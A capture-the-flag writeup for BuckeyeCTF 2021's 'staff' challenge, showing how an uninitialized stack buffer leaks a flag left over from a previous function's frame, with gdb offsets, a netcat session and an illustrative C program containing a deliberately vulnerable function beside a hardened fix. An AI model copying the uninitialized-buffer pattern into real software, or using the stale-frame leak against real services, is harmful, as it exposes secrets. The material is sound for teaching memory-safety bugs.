Tags: 2021 pwn buckeyectf staff 

Rating:

If you look at the two lookup functions, the `instructor` string is printed at the end of both, but in one of them that print is unreachable:

```c
// find_instructor()
printf("Professor %s will teach %s, but we'll probably change our minds the week before classes start.\n", instructor, course);

// find_course()
printf("This course will be taught by: %s\n", instructor);
```

If you check in `gdb`,

`$rbp = 0x7fffffffd120` for both `find_course` and `find_instructor`: both are called from the same menu loop, so their stack frames land on exactly the same memory.

Also,

- for `find_course`, `instructor` is at `rbp - 0x30` and `course` at `rbp - 0x50`
- for `find_instructor`, `instructor` is at `rbp - 0x50` and `course` at `rbp - 0x30`

so the two buffers swap places between the frames: `find_course`'s `instructor` slot is `find_instructor`'s `course` slot.

Normally we would just pass `FLAG 1337` to `find_course` and read the flag, but the print that would show it is unreachable. Even so, the lookup still copies the flag into `instructor` at `rbp - 0x30`, and nothing clears that slot when the function returns. When we then call `find_instructor`, its `course` variable sits at the same `rbp - 0x30` and is never initialized, so it already holds the flag. All we need is a query that prints `course` without writing to it first. Searching for `Staff` does exactly that: the search is ambiguous (`There were 6 results`), so `course` is never filled in, yet the final `printf` still runs and prints the stale flag. You can confirm this in `gdb` by breaking on `find_instructor` after the `FLAG 1337` lookup and running `x/s $rbp-0x30`.
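The pattern behind this bug, as an added example that is not part of the original writeup or the challenge source: two sibling functions called at the same stack depth, one of which leaves a secret in a local buffer, and the other of which prints a local it only initializes on one path. The catalog and the placeholder flag are constructed for the example, the function bodies are my reconstruction of the behaviour the writeup describes, and whether the frames overlap the way they did in the challenge binary depends on the compiler and flags (build with `-O0` to see the leak; with GCC 12+/Clang, `-ftrivial-auto-var-init=zero` closes this whole class). A hardened variant is included beside the vulnerable one.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAMELEN 32

/* Constructed catalog standing in for the challenge's database; the "flag" is
 * a placeholder. Several courses share "Staff" so that searching for "Staff"
 * is ambiguous, as it was in the transcript. */
struct entry { const char *course; const char *instructor; };
static const struct entry catalog[] = {
    { "CSE 2421",  "Staff" },
    { "CSE 2431",  "Staff" },
    { "MATH 1151", "Staff" },
    { "FLAG 1337", "flag{placeholder}" },
};
#define NCATALOG (sizeof catalog / sizeof catalog[0])

/* volatile so the compiler cannot prove the revealing printf is dead and
 * drop the copy into `instructor` as a dead store. It is never set. */
static volatile int never = 0;

/* Modelled on find_course(): the looked-up instructor is copied into a stack
 * buffer, but only a generic line is printed. After return the bytes are
 * still sitting in the dead frame. */
__attribute__((noinline)) void find_course(const char *query)
{
    char instructor[NAMELEN];
    char course[NAMELEN];

    snprintf(course, sizeof course, "%s", query);
    for (size_t i = 0; i < NCATALOG; i++)
        if (strcmp(catalog[i].course, course) == 0)
            snprintf(instructor, sizeof instructor, "%s", catalog[i].instructor);
    printf("This course will be taught by: %s\n", "Staff");
    if (never)  /* unreachable, as in the challenge */
        printf("This course will be taught by: %s\n", instructor);
}

/* Modelled on find_instructor(): `course` is only written when the search is
 * unambiguous, but it is printed on every path. On the "N results" path it
 * shows whatever the previous frame left in that stack slot. Returns the
 * match count and copies what was printed into `out`. The bounded %.*s
 * keeps the read inside the buffer even if it holds no NUL. */
__attribute__((noinline)) int find_instructor_vuln(const char *query,
                                                   char *out, size_t outlen)
{
    char course[NAMELEN];        /* deliberately uninitialized */
    char instructor[NAMELEN];
    int matches = 0;
    size_t hit = 0;

    snprintf(instructor, sizeof instructor, "%s", query);
    for (size_t i = 0; i < NCATALOG; i++)
        if (strcmp(catalog[i].instructor, instructor) == 0) { matches++; hit = i; }
    if (matches == 1)
        snprintf(course, sizeof course, "%s", catalog[hit].course);
    else if (matches > 1)
        printf("There were %d results, please be more specific in your search.\n", matches);
    printf("Professor %s will teach %.*s, but we'll probably change our minds.\n",
           instructor, (int)sizeof course, course);
    snprintf(out, outlen, "%.*s", (int)sizeof course, course);
    return matches;
}

/* Hardened: every local is initialized, and nothing derived from `course` is
 * printed unless the lookup produced exactly one result, so stale frame data
 * can never reach the output. */
__attribute__((noinline)) int find_instructor_fixed(const char *query,
                                                    char *out, size_t outlen)
{
    char course[NAMELEN] = "";
    char instructor[NAMELEN] = "";
    int matches = 0;
    size_t hit = 0;

    snprintf(instructor, sizeof instructor, "%s", query);
    for (size_t i = 0; i < NCATALOG; i++)
        if (strcmp(catalog[i].instructor, instructor) == 0) { matches++; hit = i; }
    if (matches != 1) {
        printf("%s\n", matches ? "Please be more specific in your search." : "No results.");
        snprintf(out, outlen, "%s", "");
        return matches;
    }
    snprintf(course, sizeof course, "%s", catalog[hit].course);
    printf("Professor %s will teach %s.\n", instructor, course);
    snprintf(out, outlen, "%s", course);
    return matches;
}

int main(void)
{
    char out[NAMELEN];
    find_course("FLAG 1337");                     /* plants the secret */
    find_instructor_vuln("Staff", out, sizeof out);   /* may print it */
    find_course("FLAG 1337");
    find_instructor_fixed("Staff", out, sizeof out);  /* never does */
    return 0;
}
```

Compile with `gcc -O0 -fno-stack-protector` to reproduce the stale-frame read; the stack protector does not stop this bug, since nothing is overflowed, but optimization can move the locals so the slots no longer line up. The fix has two independent parts, and both matter: initializing the locals removes the stale data, and refusing to print on the ambiguous path removes the information leak even if a later refactor drops the initializer.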

```text
❯ nc pwn.chall.pwnoh.io 13383
What would you like to do?
1. Search for a course
2. Search for an instructor
> 1
What course would you like to look up?
> FLAG 1337
This course will be taught by: Staff
What would you like to do?
1. Search for a course
2. Search for an instructor
> 2
What instructor would you like to look up?
> Staff
There were 6 results, please be more specific in your search.
Professor Staff will teach buckeye{if_0n1y_th15_w0rk3d}, but we'll probably change our minds the week before classes start.
```

Original writeup (https://7phalange7.github.io/2021/10/25/buckeyectf.html#staff).